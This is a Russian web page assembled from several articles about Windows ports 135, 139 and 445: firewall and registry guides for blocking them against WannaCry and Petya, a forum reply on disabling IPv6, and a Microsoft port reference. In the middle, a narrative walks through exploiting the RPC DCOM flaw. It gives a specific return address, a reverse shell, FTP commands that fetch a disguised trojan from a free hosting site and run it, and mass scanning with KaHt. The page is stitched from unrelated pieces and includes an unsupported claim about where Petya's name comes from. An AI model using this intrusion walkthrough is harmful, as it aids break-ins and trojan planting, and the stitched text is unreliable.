Разное

Порт tcp 135: Порт 135 (tcp/udp) — Поиск TCP UDP Портов Online

Содержание

За что отвечает 135 порт в windows. Как закрыть порты Windows. Используем командную строку

Вчера неизвестные устроили очередную массовую атаку с помощью вируса-шифровальщика. Эксперты заявили, что пострадали десятки крупных компаний на Украине и в России. Вирус-шифровальщик носит название Petya.A (вероятно, вирус назван в честь Петра Порошенко). Пишут, что если создать файл perfc (без расширения) и разместить его по адресу C:\Windows\, вирус обойдет вас стороной. Если ваш компьютер ушел в перезагрузку и начал «проверку диска», нужно его немедленно выключить. Загрузка с с LiveCD или USB-диска даст доступ к файлам. Еще один способ защиты: закрыть порты 1024–1035, 135 и 445. Как это сделать мы сейчас разберемся на примере Windows 10.

Шаг 1
Переходим в Брандмауэр Windows (лучше выбрать режим повышенной безопасности), выбираем вкладку «Дополнительные параметры ».
Выбираем вкладку «Правила для входящих подключений », потом действие «Создать правило » (в правой колонке).

Шаг 2


Выбираем тип правила - «для Порта ». В следующем окне выбираем пункт «Протокол TCP », указываем порты, которые хотите закрыть. В нашем случае это «135, 445, 1024-1035 » (без кавычек).

Шаг 3
Выбираем пункт «Блокировать подключение », в следующем окне отмечаем все профили: Доменный, Частный, Публичный.

Шаг 4
Осталось придумать название для правила (чтобы в будущем его было легко найти). Можно указать описание правила.

Если какие-то программы перестанут работать или станут работать неправильно, возможно, вы перекрыли порт, которые они используют. Нужно будет добавить для них исключение в брандмауэре.

135 TCP-порт используется службами удалённого обслуживания (DHCP, DNS, WINS и т.д.) и в приложениях «клиент-сервер» Microsoft (например, Exchange).

445 TCP-порт используется в Microsoft Windows 2000 и поздних версий для прямого TCP/IP-доступа без использования NetBIOS (например, в Active Directory).

Публикация

Вирус WannaCry, он же WannaCrypt или Wanna Decryptor, поразил виртуальный мир в мае 2017 года. Вредоносная программа проникала в локальные сети, заражая один компьютер за другим, шифровала файлы на дисках и требовала от пользователя перевести вымогателям от $300 до $600 за их разблокировку. Аналогичным образом действовал вирус Petya, получивший едва ли не политическую известность летом 2017 года.

Оба сетевых вредителя проникали в операционную систему компьютера-жертвы через одну и ту же дверь - сетевые порты 445 или 139. Вслед за двумя крупными вирусами и более мелкие виды компьютерной заразы начали эксплуатировать Что же это за порты, которые сканируют все, кому не лень?

За что отвечают порты 445 и 139 в ОС Windows

Данные порты используются в системе Windows для совместной работы с файлами и принтерами. Первый порт отвечает за работу протокола Server Message Blocks (SMB), а через второй работает протокол Network Basic Input-Output System (NetBIOS). Оба протокола позволяют компьютерам под управлением Windows подключаться по сети к «расшаренным» папкам и принтерам поверх основных протоколов TCP и UDP.

Начиная с Windows 2000, совместная работа с файлами и принтерами по сети осуществляется в основном через порт 445 по прикладному протоколу SMB. Протокол NetBIOS использовался в более ранних версиях системы, работая через порты 137, 138 и 139, и данная возможность сохранилась в более поздних версиях системы в качестве атавизма.

Чем опасны открытые порты

445 и 139 представляет собой незаметную, но значимую уязвимость в Windows. Оставляя данные порты незащищенными, вы широко распахиваете дверь на свой жесткий диск для непрошеных гостей вроде вирусов, троянов, червей, а также для хакерских атак. А если ваш компьютер включен в локальную сеть, то риску заражения вредоносным программным обеспечением подвергаются все ее пользователи.

Фактически, вы открываете совместный доступ к своему жесткому диску любому, кто сумеет получить доступ к данным портам. При желании и умении злоумышленники могут просмотреть содержимое жесткого диска, а то и удалить данные, форматировать сам диск или зашифровать файлы. Именно это и делали вирусы WannaCry и Petya, эпидемия которых прокатилась по миру этим летом.

Таким образом, если вы заботитесь о безопасности своих данных, будет не лишним узнать, как закрыть порты 139 и 445 в Windows.

Выясняем, открыты ли порты

В большинстве случаев порт 445 в Windows открыт, так как возможности совместного доступа к принтерам и файлам автоматически включаются еще при установке Windows. Это можно легко проверить на своей машине. Нажмите сочетание клавиш Win + R , чтобы открыть окно быстрого запуска. В нем введите cmd” для запуска командной строки. В командной строке наберите “netstat - na ” и нажмите Enter . Данная команда позволяет просканировать все активные сетевые порты и вывести данные об их статусе и текущих входящих подключениях.

Через несколько секунд появится таблица статистики по портам. В самом верху таблицы будет указан IP-адрес порта 445. Если в последнем столбце таблицы будет стоять статус “LISTENING” , то это означает, что порт открыт. Аналогичным образом можно найти в таблице порт 139 и выяснить его статус.

Как закрыть порты в Windows 10/8/7

Существует три основных метода, позволяющих закрыть порт 445 в Windows 10, 7 или 8. Они не сильно отличаются друг от друга в зависимости от версии системы и достаточно просты. Можно попробовать любой из них на выбор. Этими же способами можно закрыть и порт 139.

Закрываем порты через брандмауэр

Первый метод, позволяющий закрыть 445 порт в Windows, является наиболее простым и доступен практически любому пользователю.

  1. Перейдите в Пуск > Панель управления > Брандмауэр Windows и нажмите на ссылку Дополнительные параметры .
  2. Нажмите Правила для входящих исключений > Новое правило . В отобразившемся окне выберите Для порта > Далее > Протокол TCP > Определенные локальные порты , в поле рядом введите 445 и нажмите Далее.
  3. Далее выберите Блокировать подключение и опять нажмите Далее . Установите три галочки, снова Далее . Укажите название и, при желании, описание нового правила и нажмите
    Готово
    .

Теперь возможность входящего соединения на порт 445 будет закрыта. Если необходимо, аналогичное правило можно создать и для порта 139.

Закрываем порты через командную строку

Второй метод включает в себя операции с командной строкой и больше подходит для продвинутых пользователей Windows.

  1. Нажмите Пуск и в строке поиска в нижней части меню наберите “cmd” . В отобразившемся списке кликните правой кнопкой мыши на cmd и выберите Запуск от имени администратора .
  2. В окно командной строки скопируйте команду netsh advfirewall set allprofile state on. Нажмите Enter.
  3. Затем скопируйте следующую команду: netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_TCP-445". Нажмите Enter еще раз.

В результате выполнения процедуры так же будет создано правило брандмауэра Windows для закрытия порта 445. Некоторые пользователи, впрочем, сообщают, что данный метод не работает на их машинах: при проверке порт остается в статусе “LISTENING”. В этом случае следует попробовать третий способ, который также достаточно прост.

Закрываем порты через реестр Windows

Блокировать соединения на порт 445 можно также путем внесения изменений в системный реестр. Использовать данный метод следует с осторожностью: реестр Windows является основной базой данных всей системы, и случайно допущенная ошибка может привести к непредсказуемым последствиям. Перед работой с реестром рекомендуется сделать резервную копию, например, с помощью программы CCleaner.

  1. Нажмите Пуск и в строке поиска введите “regedit” . Нажмите Enter .
  2. В дереве реестра перейдите в следующий каталог: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters.
  3. В правой части окна отобразится список параметров. Нажмите правой кнопкой мыши в свободной области списка и выберите Создать . В раскрывающемся меню выберите Параметр DWORD (32-bit) или Параметр DWORD (64-bit) в зависимости от типа вашей системы (32-битная или 64-битная).
  4. Переименуйте новый параметр в SMBDeviceEnabled , а затем дважды кликните по нему. В отобразившемся окне Изменение параметра в поле Значение замените 1 на 0 и нажмите OK для подтверждения.

Этот способ является наиболее эффективным, если точно следовать приведенной выше инструкции. Следует отметить, что он относится только к порту 445.

Для того чтобы защита была эффективнее, после внесения изменений в реестр можно также отключить службу Windows Server. Для этого выполните следующее:

  1. Нажмите Пуск и в строке поиска введите "services.msc". Откроется список системных служб Windows.
  2. Найдите службу Server и дважды кликлите по ней. Как правило, она располагается где-то в середине списка.
  3. В отобразившемся окне в раскрывающемся списке Тип запуска выберите Отключена и нажмите ОК .

Приведенные выше методы (за исключением третьего) позволяют закрыть не только порт 445, но и порты 135, 137, 138, 139. Для этого при выполнении процедуры просто заменяйте номер порта на нужный.

Если вам впоследствии понадобится открыть порты, просто удалите созданное правило в брандмауэре Windows или измените значение созданного в реестре параметра с 0 на 1, а потом включите обратно службу Windows Server, выбрав в списке

Тип запуска значение Автоматически вместо Отключена .

Важно! Необходимо помнить, что порт 445 в Windows отвечает за совместный доступ к файлам, папкам и принтерам. Таким образом, если вы закроете данный порт, вы больше не сможете «расшарить» общую папку для других пользователей или распечатать документ по сети.

Если ваш компьютер включен в локальную сеть и данные функции необходимы вам для работы, следует воспользоваться сторонними средствами защиты. К примеру, активируйте сетевой экран вашего антивируса, который возьмет под контроль все порты и будет осуществлять их мониторинг на предмет несанкционированного доступа.

Выполняя приведенные выше рекомендации, можно обезопасить себя от незаметной, но серьезной уязвимости в Windows и защитить свои данные от многочисленных видов зловредного программного обеспечения, которое способно проникнуть в систему через порты 139 и 445.

Уязвимость была устрашающей, правда
готовый эксплоит оказался недоступен для
основной массы людей... Наверное поэтому
никто не чувствовал страха...

Группа польских экспертов в области
безопасности компьютерных технологий "Last
Stage of Delirium" сообщила публике о найденной
ими уязвимости, обработки DCOM объектов в
контексте RPC протокола. Это было чем-то
потрясающим, поскольку данный протокол
использовался практически всеми
существующими на этот момент версиями Windows.
Уязвимыми оказались ОС Windows NT, Windows XP, Windows 2000
и даже Windows Server 2003 был под прицелом. Этого
было более чем достаточно, чтобы завладеть
компьютерами большинства пользователей
сети Internet. Более того, многие серверы не
блокировали входящие пакеты на 135 порт,
именно он использовался для атаки. Что
делало их потенциальными жертвами.

Но спустя несколько часов Todd Sabin сообщает,
что уязвимыми являются все сервисы RPC. Это
значит, что настройка брандмауэра на

блокировку 135 порта является не достаточным
средством защиты. Опасности подвергаются
компьютеры с открытыми 135 (UDP/TCP), 139, 445 и 593
портами. СМИ освещают данную ошибку, как
потенциальную угрозу для безопасности
пользователей Windows. Дело шло к глобальной
катастрофе. Но поскольку публичного
эксплоита выпущено не было, все продолжали
жить своей прежней жизнью не задумываясь о
последствиях его появления в массах.

Но не все так пассивно отреагировали на
появление данной уязвимости. Хакеры
понемногу начинали писать приватные
эксплоиты, а script kids продолжали ждать его
появления. Результат не заставил себя долго
ждать. В течении нескольких дней появляются
некоторые наработки в этой области,
появляются первые эксплоиты. Тем не менее
большинство из них просто провоцирует сбой
на удаленной системе. Что можно объяснить,
поскольку технических деталей по поводу
найденной уязвимости известно не было. Хотя
некоторые версии ОС уже успешно
эксплуатировались.

Этот день стал переломным в истории
эксплуатации данной уязвимости. Наконец
появляется техническое описание проблемы.
После чего рождается большое количество
эксплоитов, под разные версии Windows.
Некоторые из них имеют даже графический
интерфейс, а иногда и функцию сканирования
определенного диапазона IP адресов.

Именно в этот момент началась массивная
атака хакеров на рядовых пользователей.
Более того, появился интернет червь MS Blast,
который с легкостью проникал на компьютеры
подключенные к Интернету и даже в
корпоративные сети крупнейших компаний
мира. В опасности оказались все...

Напасть на удаленную машину не составляет
особого труда. Поэтому script kids взялись за
свое дело. Кража кредитных кард и приватных
эксплоитов возросла в несколько раз. И
многие лакомые сегменты сети стали
пробоваться на вкус. Именно этим занялся
один хакер. Он давно хотел захватить сервер,
но приличной уязвимости под него до этого
не было. А не воспользоваться таким
подарком судьбы он просто не мог.

Пьеса в три акта

Первое, что пришлось ему сделать перед
атакой, это проверить какая именно
операционная система установлена на
сервере. Для этого он воспользовался
утилитой nmap. Хакер не раз уже писал о ее
возможностях, но я повторюсь и скажу, что
она используется для определения версии ОС
на удаленном компьютере. Благо она
существует как для Windows, так и для *nix. А
поскольку хакер для своей работы
использовал Windows, то его выбор пал на
графический вариант nmap.

Несколько минут работы сканера и
результат позитивный. 135 порт оказался
открытым и не защищенным брандмауэром. Это
было началом конца, началом долгожданной
атаки. На этот момент уже было написано
много эксплоитов, в том числе и "RCP Exploit GUI #2".
Его отличительной чертой было то, что он
имел графический интерфейс и содержал в
себе встроенные функции сканирования
диапазона IP, а также FTP сервер.

Запустив эксплоит, он указал адрес
целевого компьютера. Но в списке ОС для
атакуемых машин Windows NT указан не был. А ведь
именно она была установлена на сервере. Это
серьезная проблема, поскольку чтобы
запустить эксплоит необходимо знать его
точный адрес в памяти, чтобы потом передать
на него управление. Немного покопавшись в
файлах, скачанных вместе с эксплоитом он
нашел небольшой список адресов под широкую
разновидность линейки Windows. Среди них
присутствовал и Windows NT с предустановленным
Service Pack 4. Именно его значение он указал в
качестве адреса возврата, плюнув на ручной
выбор ОС. Число 0xE527F377 стало его тайным
пропуском в жизнь сервера. И он начал атаку.

Система сдалась без каких-либо
происшествий, так у хакера появился reverse-shell
с удаленным сервером. Теперь, когда он мог
исполнять на нем все что угодно, пришло
время установить Троян. Среди большого
числа возможных, был выбран DonaldDick. Для
осуществления своего плана ему пришлось
получить хостинг на бесплатном сервере с
поддержкой FTP. Вполне подошел BY.RU, именно
туда он и закачал сервер для трояна. Теперь,
когда DonaldDick стал доступным по FTP, он обратно
взялся за жертву, а точнее начал закачивать
на нее сервер трояна. Это был хорошо
продуманный план, поскольку уязвимость
могли пропатчить, а троян он и в Африке
троян. Набрав в консоли ftp он принялся
закачивать файл. Весь процесс занял у него,
написания всего лишь пяти строк:

open by. ru
имя_сервера.by.ru
пароль
get fooware.exe
bye

Где fooware.exe это переименованный сервер для
DonaldDick. Когда файл закачался, ему осталось
только запустить его. Для этого он просто
написал имя файла (fooware.exe) и с наслаждением
нажал Enter... После чего хакер получил удобный
контроль над сервером.

Но знаете как оно всегда бывает, когда
находишь что-то интересное продолжаешь с
этим играть. Так и наш Хакер захотел
получить более чем одну систему. Посмотрев,
что эксплоит позволяет провести массивное
сканирование, он взялся за работу, а точнее
за работу взялся KaHt. Его использование
оказалось не трудным. Так например, чтобы
про сканировать сеть с IP 192.168.0.* (класс С), ему
нужно было набрать "KaHt.exe 129.168.0.1
192.168.0.254". Что собственно он и сделал,
после чего периодически проверял
результаты. Таким образом он получил доступ
к еще большему количеству пользователей, от
которых потом сумел получить пароли на
разные сервисы, почты, и много другой
полезной информации. Не говоря уже про то,
что он стал пользоваться многими из них как
анонимными прокси.

Пища к размышлению

Хотя Microsoft давно выпустила заплатку,
пользователи и админы не спешат
устанавливать патчи, надеясь что их сеть не
будет никому интересной. Но таких хакеров
большое количество и установка патча это
скорее необходимость, нежели возможность.
Еще можно блокировать все входящие пакеты
на 135, 139, 445 и 593 порты.

Естественно, что все это хакер делал через
анонимную прокси, а в результате почистил
за собой следы присутствия в системе. Но вам
следует задуматься, прежде чем повторять
его подвиги. Ведь такие действия считаются
противозаконными и могут закончиться для
вас достаточно плачевно...

Кровный , то, что у вас фаервол показывает, что svchost.exe слушает данный порт, ещё не означает, что он открыт для подключения извне.

Правила у вас вроде бы прописаны и должны работать.

Вы сканерами портов пробовали проверять? - ЦОБ (Центр Обеспечения Безопасности) (п. 2.7)

И не забудьте о том, что ещё надо будет проверить IPv6, т.к. он у вас в системе включен, а вот сканеры обычно проверяют только IPv4 (я про централизованные сервисы).

Если данный протокол вам вообще не нужен, тогда его можно отключить:

Чтобы отключить компоненты IP версии 6 в Windows Vista, выполните указанные ниже действия.

1. Нажмите кнопку Пуск, введите regedit в поле Начать поиск, затем выберите regedit.exe в списке Программы.

2. В диалоговом окне Контроль учетных записей пользователей нажмите кнопку Продолжить.

3. Найдите и выберите следующий подраздел реестра:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\

4. Дважды щелкните пункт DisabledComponents для изменения параметра DisabledComponents.

Примечание. Если параметр DisabledComponents недоступен, его необходимо создать. Для этого выполните указанные ниже действия.

1. В меню Правка выберите пункт Создать, а затем - Параметр DWORD (32 бита).

2. Введите DisabledComponents и нажмите клавишу ВВОД.

3. Дважды щелкните пункт DisabledComponents.

5. Введите любое из указанных ниже значений для настройки протокола IP версии 6, а затем нажмите кнопку ОК.

1. Введите 0, чтобы включить все компоненты IP версии 6.

Примечание. Значение "0" используется по умолчанию.

2. Введите 0xffffffff, чтобы отключить все компоненты IP версии 6, кроме интерфейса замыкания на себя. При этом значении Windows Vista также будет использовать в политиках префиксов протокол IP версии 4 вместо IPv6.

3. Введите 0x20, чтобы использовать в политиках префикса IP версии 4 вместо IP версии 6.

4. Введите 0x10, чтобы отключить собственные интерфейсы IP версии 6.

5. Введите 0x01, чтобы отключить все туннельные интерфейсы IP версии 6.

6. Введите 0x11, чтобы отключить все интерфейсы IP версии 6, кроме интерфейса замыкания на себя.

Примечания

* Использования других значений (кроме 0x0 или 0x20) может вызвать сбой в работе службы маршрутизации и удаленного доступа.

* Чтобы изменения вступили в силу, необходимо перезагрузить компьютер.

Информация в данной статье относится к следующим продуктам.

* Windows Vista Enterprise

* Windows Vista Enterprise 64-bit edition

* Windows Vista Home Basic 64-bit edition

* Windows Vista Home Premium 64-bit edition

* Windows Vista Ultimate 64-bit edition

* Windows Vista Business

* Windows Vista Business 64-bit edition

* Windows Vista Home Basic

* Windows Vista Home Premium

* Windows Vista Starter

* Windows Vista Ultimate

* Windows 7 Enterprise

* Windows 7 Home Basic

* Windows 7 Home Premium

* Windows 7 Professional

* Windows 7 Ultimate

* Windows Server 2008 R2 Datacenter

* Windows Server 2008 R2 Enterprise

* Windows Server 2008 R2 Standard

* Windows Server 2008 Datacenter

* Windows Server 2008 Enterprise

* Windows Server 2008 Standard

Источник - http://support. microsoft.com/kb/929852

После отключения и перезагрузки у вас из списка, получаемого командой ipconfig /all исчезнет куча лишних строк и останутся только хорошо известные вам интерфейсы.

Обратное включение выполняется простым удалением созданного ключа из реестра или заменой значения на "0" с последующей перезагрузкой.

Каждый день владельцы ПК сталкиваются с огромным количеством опасных программ и вирусов, которые так или иначе попадают на жесткий диск и становятся причиной утечки важных данных, поломки компьютера, кражи важной информации и других неприятных ситуаций.

Чаще всего заражаются компьютеры, работающие на ОС Windows любых версий, будь то 7, 8, 10 или любая другая. Главная причина такой статистики – входящие подключения к ПК или «порты», которые являются слабым местом любой системы из-за своей доступности по умолчанию.

Слово «порт» – это термин, подразумевающий порядковый номер входящих подключений, которые направляются на ваш ПК от внешнего программного обеспечения. Часто бывает так, что эти порты используют вирусы, запросто проникающие на ваш компьютер при помощи IP-сети.

Вирусное программное обеспечение, попав в компьютер через такие входящие подключения, быстро заражает все важные файлы, причём не только пользовательские, но и системные. Чтобы этого избежать, мы рекомендуем закрыть все стандартные порты, которые могут стать вашим уязвимым местом при атаке хакеров.

Какие порты у Windows 7-10 самые уязвимые?

Многочисленные исследования и опросы специалистов показывают, что до 80% вредоносных атак и взломов происходили при помощи четырех основных портов, использующихся для быстрого обмена файлами между разными версиями Windows:

  • TCP порт 139, необходимый для удаленного подключения и управления ПК;
  • TCP порт 135, предназначенный для выполнения команд;
  • TCP порт 445, позволяющий быстро передавать файлы;
  • UDP порт 137, с помощью которого проводится быстрый поиск на ПК.

Закрываем порты 135-139 и 445 в Виндовс

Мы предлагаем вам ознакомиться с самыми простыми способами закрытия портов Виндовс, которые не требуют дополнительных знаний и профессиональных навыков.

Используем командную строку

Командная строка Windows – это программная оболочка, которая используется для задания определенных функций и параметров софту, не имеющему собственной графической оболочки.

Для того чтобы запустить командную строку, необходимо:

  1. Одновременно нажать сочетание клавиш Win+R
  2. В появившейся командной строке ввести CMD
  3. Нажать на кнопку «ОК»

Появится рабочее окно с чёрным фоном, в котором необходимо поочередно вводить нижеприведенные команды. После каждой введенной строчки нажимайте клавишу Enter для подтверждения действия.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=»Block1_TCP-135″ (команда для закрытия порта 135)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=»Block1_TCP-137″ (команда для закрытия порта 137)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=»Block1_TCP-138″ (команда для закрытия порта 138)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=»Block_TCP-139″ (команда для закрытия порта 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=»Block_TCP-445″ (команда для закрытия порта 445)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=»Block_TCP-5000″

Шесть приведенных нами команд необходимы для: закрытия 4х уязвимых TCP-портов Windows (открытых по умолчанию), закрытия UDP-порта 138, а также закрытия порта 5000, который отвечает за выведение списка доступных сервисов.

Закрываем порты сторонними программами

Если вы не хотите тратить время на работу с командной строкой, мы предлагаем вам ознакомиться со сторонними приложениями. Суть такого софта заключается в правке реестра в автоматическом режиме с графическим интерфейсом, без необходимости в ручном введении команд.

По мнению наших пользователей, самой популярной программой для этих целей является Windows Doors Cleaner. Она поможет с лёгкостью закрыть порты на компьютере с ОС Windows 7/8/8.1/10. Более старые версии операционных систем, к сожалению, не поддерживаются.

Как работать с программой, закрывающей порты

Для того чтобы воспользоваться Windows Doors Cleaner, необходимо:

1. Скачать софт и установить его
2. Запустить программу, нажав на ярлык правой кнопкой мыши и выбрав «запустить от имени администратора»
3. В появившемся рабочем окне будет список портов и кнопки «Сlose» или «Disable», которые закрывают уязвимые порты Windows, а также любые другие по желанию
4. После того, как необходимые изменения были внесены, необходимо перезагрузить систему

Ещё одним преимуществом программы является тот факт, что порты с её помощью можно не только закрывать, но и открывать.

Делаем выводы

Закрытие уязвимых сетевых портов в Виндовс – это не панацея от всех бед. Важно помнить, что сетевая безопасность может быть достигнута только комплексными действиями, нацеленными на закрытие всех уязвимостей вашего ПК.

Для безопасности Windows пользователь в обязательном порядке должен устанавливать критические обновления от Microsoft, иметь лицензированных антивирусный софт и включенный файервол, использовать исключительно безопасное программное обеспечение и регулярно читать наши статьи, в которых рассказываем обо всех существующих способах достижения анонимности и безопасности ваших данных.

Вы знаете более удобные способы закрыть сетевые порты? Поделитесь своими знаниями в комментариях и не забывайте репостить статью к себе на страничку. Делитесь полезной информацией со своими друзьями и не дайте хакерам шанса навредить вашим близким!

Службы и сетевые порты в серверных системах Microsoft Windows. Часть 1

главная - Статьи - Microsoft Windows


Теги: Настройка сервера

В данной статье рассмотрены основные сетевые порты, протоколы и службы, которые используются клиентскими и серверными операционными системами Майкрософт, серверными программами и их компонентами в серверных системах Microsoft Windows. Представленные сведения предназначены для помощи администраторам и специалистам службы поддержки при определении портов и протоколов, необходимых приложениям и операционным системам Майкрософт для функционирования в сегментированной сети.

Содержащиеся в этой статье сведения о портах не следует применять при настройке брандмауэра Windows. Сведения о настройке брандмауэра Windows см. в техническом справочнике параметров брандмауэра Windows (Windows Firewall Settings Technical Reference).

Серверная система Windows располагает интегрированной комплексной инфраструктурой, которая предназначена для удовлетворения потребностей разработчиков программного обеспечения и специалистов в области информационных технологий. Запущенные в такой системе программы и решения позволяют сотрудникам быстро, без дополнительных осложнений получать, анализировать и совместно использовать информацию. Серверы, клиентские компьютеры и серверные приложения Майкрософт используют большое количество сетевых портов и протоколов для обмена данными по сети с клиентскими компьютерами и другими серверными системами. Выделенные брандмауэры, брандмауэры в составе узла, а также фильтры безопасности протокола Интернета (IPSec) служат для обеспечения безопасности сети, но, с другой стороны, если с их помощью блокируются порты и протоколы, которые используются определенным сервером, то сервер не сможет отвечать на запросы клиентских компьютеров.

Обзор

Ниже представлен краткий обзор содержания этой статьи.
Раздел Порты системных служб содержит краткое описание каждой службы с указанием логического имени, а также портов и протоколов, которые необходимы ей для правильного функционирования. Обращайтесь к этому разделу для получения сведений об используемых определенной службой портах и протоколах.
В разделе Порты и протоколы сведения предыдущего раздела обобщены в форме таблицы (таблица отсортирована по номерам портов, а не названиям служб). Обращайтесь к этому разделу для получения сведений о том, какие службы ожидают на определенном порте.
Чтобы предупредить возможное возникновение недоразумений, внимательно ознакомьтесь с представленным ниже описанием используемых в статье терминов.
Системная служба. Серверная система Windows включает большое число программных продуктов, например операционные системы семейств Microsoft Windows 2000 и Microsoft Windows Server 2003, приложения Microsoft Exchange 2000 Server и Microsoft SQL Server 2000. Каждый из этих продуктов состоит из отдельных компонентов, одним из которых и являются системные службы. Системные службы запускаются операционной системой автоматически в процессе загрузки компьютера или по мере необходимости, при выполнении стандартных операций. Так, к числу системных служб на компьютере под управлением Windows Server 2003 Enterprise Edition, помимо прочего, относят службу сервера, службу диспетчера печати и службу веб-публикации. Каждой системной службе сопоставлено обычное имя и понятное имя. Понятное имя службы отображается в средствах управления с графическим интерфейсом, например оснастке «Службы» из состава консоли ММС. Обычное имя службы используется в программах с интерфейсом командной строки, а также многих языках написания сценариев. Системная служба может включать в себя одну или несколько сетевых служб.
Прикладной протокол. В контексте этой статьи прикладной протокол – это сетевой протокол верхнего уровня, который использует один или несколько протоколов и портов TCP/IP, например HTTP (Hypertext Transfer Protocol), SMB (Server Message Block) и SMTP (Simple Mail Transfer Protocol).
Протокол. Протоколы TCP/IP функционируют на более низком уровне, чем прикладные протоколы, и являются стандартным форматом взаимодействия между устройствами в сети. К протоколам TCP/IP относятся TCP, UDP (User Datagram Protocol) и ICMP (Internet Control Message Protocol).
Порт. Сетевой порт, на котором системная служба ожидает входящий сетевой трафик.
Данная статья не содержит сведений о том, какие службы зависят от других служб при осуществлении обмена данными в сети. Например, для назначения динамических TCP-портов многие службы Windows используют удаленный вызов процедур (RPC) или модель DCOM. Служба удаленного вызова процедур координирует запросы других системных служб, которым для взаимодействия с клиентскими компьютерами необходимы функции RPC или DCOM. Другие службы используют NetBIOS и SMB (протоколы, которые в действительности предоставляются службой сервера) либо HTTP или HTTPS (Hypertext Transfer Protocol Secure) (предоставляются службами IIS). Полное описание архитектуры операционных систем Windows выходит за рамки рассматриваемых в данной статье вопросов. Документацию по этой теме см. на веб-узлах Microsoft TechNet и MSDN (Microsoft Developer Network). Несмотря на то что один и тот же порт TCP или UDP часто используется многими службами, одновременно только одна служба или процесс может активно ожидать на этом порте.

Когда в качестве транспортного протокола для удаленного вызова процедур используется протокол TCP/IP или UDP/IP, входящие порты часто назначаются системным службам динамически по мере необходимости (порты TCP/IP и UDP/IP с номерами выше 1024). Неофициально они называются произвольными RPC-портами. В таких случаях клиенты RPC для определения назначенных серверу динамических портов используют службу отображения конечных точек RPC. Для некоторых служб, которые используют удаленный вызов процедур, чтобы не полагаться на динамическое назначение, можно настроить определенный порт. Кроме того, для любой службы можно ограничить диапазон динамически назначаемых портов. Дополнительные сведения см. в разделе «Ссылки» этой статьи.

Данная статья содержит сведения о ролях системных служб и ролях сервера для продуктов корпорации Майкрософт, которые перечислены в разделе «Информация в данной статье относится к следующим продуктам». Эти сведения часто применимы и к Microsoft Windows XP или Microsoft Windows 2000 Professional, однако в основном статья ориентирована на операционные системы серверного типа. По этой причине в статье описаны порты, на которых ожидают службы, а не порты, используемые клиентскими программами для подключения к удаленной системе.

Порты системных служб

В данном разделе содержится описание каждой системной службы с указанием логического имени, а также используемых портов и протоколов.
Active Directory (локальный администратор безопасности)
Служба Active Directory выполняется как процесс LSASS и содержит модули проверки подлинности и репликации для контроллеров домена под управлением Windows 2000 и Windows Server 2003. Контроллерам домена, клиентским компьютерам и серверам приложений требуется возможность подключения к службе Active Directory по определенным жестко запрограммированным портам (в дополнение к диапазону временных TCP-портов с номерами от 1024 до 65536), кроме случаев, когда для инкапсуляции трафика применяется протокол туннелирования. Примерный состав решения с инкапсуляцией трафика: шлюз виртуальной частной сети под защитой осуществляющего фильтрацию маршрутизатора, использующего протокол L2TP (Layer 2 Tunneling Protocol) с безопасностью IPSec. В этом случае необходимо разрешить протоколам ESP (IPSec Encapsulating Security Protocol) (IP-протокол 50), IPSec Network Address Translator Traversal NAT-T (UDP-порт 4500) и ISAKMP (IPSec Internet Security Association and Key Management Protocol) (UDP-порт 500) проходить через маршрутизатор, вместо того чтобы открывать все перечисленные ниже порты и протоколы. В завершение порт, использующийся для репликации Active Directory, можно жестко запрограммировать в соответствии с инструкциями в статье 224196 «Назначение порта для трафика репликации Active Directory».

Примечание. Фильтрация пакетов трафика L2TP не нужна, поскольку протокол L2TP защищен протоколом IPsec ESP.

Имя системной службы: LSASS

Прикладной протоколПротоколПорты
Сервер глобального каталогаTCP3269
Сервер глобального каталогаTCP3268
Сервер LDAPTCP389
Сервер LDAPUDP389
LDAP SSLTCP636
LDAP SSLUDP636
IPsec ISAKMPUDP500
NAT-TUDP4500
RPCTCP135
ТСР-порты с большими номерами, произвольно назначенные службой RPCTCP1024 - 65536
Служба шлюза уровня приложения
Этот компонент службы общего доступа к подключению Интернета (ICS)/брандмауэра подключения к Интернету (ICF) предназначен для поддержки подключаемых модулей, которые позволяют сетевым протоколам проходить через брандмауэр и функционировать в случае использования общего доступа к подключению Интернета. Подключаемые модули шлюза уровня приложения (Application Layer Gateway, ALG) могут открывать порты и изменять данные (например, порты и IP-адреса) в составе сетевых пакетов. FTP (File Transfer Protocol) – это единственный сетевой протокол с подключаемым модулем, который входит в состав Windows Server 2003 Standard Edition и Windows Server 2003 Enterprise Edition. Подключаемый модуль ALG FTP предназначен для поддержки активных сеансов по протоколу FTP через устройство преобразования сетевых адресов (NAT) путем перенаправления всего трафика, который проходит через устройство NAT на порт 21, на частный порт ожидания с номером в диапазоне от 3000 до 5000 на адаптере замыкания на себя. Подключаемый модуль контролирует и обновляет трафик управляющего канала FTP, пересылает через устройство NAT сопоставление портов для каналов данных FTP, а также обновляет порты в потоке управляющего канала FTP.

Имя системной службы: ALG

Прикладной протоколПротоколПорты
Управление FTPTCP21
Служба состояния сеанса ASP.
NET Служба состояния сеанса ASP.NET предназначена для поддержки внепроцессных состояний сеанса ASP.NET. Служба хранит данные сеанса вне процесса и использует сокеты для взаимодействия с запущенной на сервере средой ASP.NET.

Имя системной службы: aspnet_state

Прикладной протоколПротоколПорты
Состояние сеанса ASP.NETTCP42424
Службы сертификации
Службы сертификации являются частью ядра операционной системы. Они позволяют предприятию выступать в роли самостоятельного центра сертификации (СА), что дает ему возможность выпускать и управлять цифровыми сертификатами для программ и протоколов, например расширений S/MIME (Secure/Multipurpose Internet Mail Extensions), протокола SSL (Secure Sockets Layer), файловой системы EFS (Encrypting File System), системы безопасности IPSec, а также входа в систему с помощью смарт-карты. Взаимодействие с клиентами служба сертификации осуществляет с помощью технологий RPC и DCOM через произвольные TCP-порты с номерами больше 1024.

Имя системной службы: CertSvc

Прикладной протоколПротоколПорты
RPCTCP135
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534
Служба кластеров
